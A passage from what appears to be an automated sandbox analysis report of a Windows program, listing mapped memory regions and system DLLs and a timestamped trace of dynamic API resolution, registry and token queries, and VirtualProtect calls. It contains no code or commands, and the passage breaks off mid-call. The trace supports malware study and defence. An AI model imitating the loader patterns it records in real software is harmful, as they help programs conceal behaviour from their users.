0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 5290 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 5294 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 
5295 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5296 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5297 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5298 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5299 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5300 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5301 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5303 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5304 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 5305 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5306 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5307 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5308 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5309 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5310 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5311 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 5314 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5315 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5316 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5317 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5318 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5319 start_va = 0x6f0000 end_va = 0x12effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 5320 start_va = 0x12f0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5321 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5322 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5323 start_va = 0x1430000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 5324 start_va = 0x1660000 end_va = 0x192efff entry_point = 0x1660000 region_type = mapped_file name = "sortdefault.nls" filename = 
"\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5325 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 5326 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5337 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 5338 start_va = 0x1430000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 5339 start_va = 0x1620000 end_va = 0x165ffff entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 5340 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5341 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 5342 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5343 start_va = 0x1930000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 5344 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: 
"c:\\windows\\system32\\iphlpapi.dll") Region: id = 5345 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5432 start_va = 0x1a50000 end_va = 0x1b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a50000" filename = "" Region: id = 5433 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5434 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 53 os_tid = 0xcc4 [0108.791] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0108.791] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.792] GetProcAddress 
(hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0108.792] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0108.793] GetProcAddress 
(hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0108.793] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e 
[0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0108.794] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0108.795] GetProcAddress (hModule=0x76910000, 
lpProcName="FindNextFileW") returned 0x7695963a [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0108.795] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.796] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.796] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 
0x76961da4 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0108.796] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.797] GetProcAddress (hModule=0x76910000, 
lpProcName="GetModuleFileNameW") returned 0x76963c26 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0108.797] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0108.798] 
LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0108.798] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0108.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0108.798] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0108.799] LoadLibraryA 
(lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0108.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0108.799] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0108.799] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0108.799] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0108.799] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0108.800] GetProcAddress (hModule=0x76c10000, 
lpProcName="VariantClear") returned 0x76c13eae [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0108.800] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.800] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0108.800] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0108.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0108.800] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0108.800] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0108.800] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.800] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0108.801] GetProcAddress 
(hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0108.801] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0108.801] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0108.801] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0108.801] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0108.801] SetThreadLocale (Locale=0x400) returned 1 [0108.802] GetVersion () returned 0x1db10106 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0108.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0108.802] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0108.802] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, 